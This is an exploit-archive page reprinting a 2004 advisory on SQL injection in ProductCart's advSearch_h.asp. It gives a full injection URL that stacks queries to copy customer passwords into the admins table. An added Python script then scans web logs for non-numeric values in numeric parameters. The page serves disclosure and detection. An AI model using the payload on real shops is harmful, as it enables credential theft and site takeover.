ProductCart 1.x/2.x - advSearch_h.asp Multiple SQL Injections

๐Ÿ—“๏ธย 16 Feb 2004ย 00:00:00Reported byย Nick GudovTypeย 
exploitpack
ย exploitpack
๐Ÿ‘ย 69ย Views

ProductCart 1.x/2.x has multiple vulnerabilities that allow SQL injection and expose data.

source: https://www.securityfocus.com/bid/9669/info
 
EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software.

http://www.example.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel
+)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&I
+DBrand=0&resultCnt=200&Submit.x=33&
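
A detection check for the request shape above, as an added example that is not part of the original advisory: it scans web access-log lines for advSearch_h.asp requests in which a parameter that should carry a plain number carries anything else. The set of numeric parameters is an assumption inferred from the values in the URL above, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: these advSearch_h.asp parameters are meant to carry plain numbers,
# inferred only from the values they have in the URL on this page.
NUMERIC_PARAMS = {"idcategory", "idsupplier", "customfield", "pricefrom",
                  "priceuntil", "idbrand", "resultcnt"}
NUMBER = re.compile(r"\d+(\.\d+)?")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation addresses, placeholder payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Feb/2004:10:00:00 +0000] "GET /productcart/pc/advSearch_h.asp'
    '?idcategory=0&idSupplier=10&priceFrom=0&priceUntil=999&keyWord=dark HTTP/1.1" 200 5120',
    '192.0.2.44 - - [16/Feb/2004:10:00:05 +0000] "GET /productcart/pc/advSearch_h.asp'
    '?idcategory=0&idSupplier=10&priceFrom=0&priceUntil=999;trailing%20text&keyWord=dark'
    ' HTTP/1.1" 200 7301',
    '192.0.2.10 - - [16/Feb/2004:10:00:09 +0000] "GET /some/other/page.asp'
    '?priceUntil=abc HTTP/1.1" 200 900',
]


def suspicious_params(request_target):
    """Names of numeric parameters whose decoded value is not a plain number."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/advsearch_h.asp"):
        return []
    bad = set()
    # Split on '&' only, so a ';' stays inside the value it was sent in.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw).strip()
        if name.lower() in NUMERIC_PARAMS and value and not NUMBER.fullmatch(value):
            bad.add(name)
    return sorted(bad)


def scan(lines):
    """Return (client address, [parameter names]) for each line that trips the check."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        bad = suspicious_params(match.group(1)) if match else []
        if bad:
            hits.append((line.split(" ", 1)[0], bad))
    return hits


if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(f"{client}: non-numeric value in {', '.join(params)}")
```

The same allow-list test, applied inside the application before a value is placed in a query, is the corresponding input-validation control.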
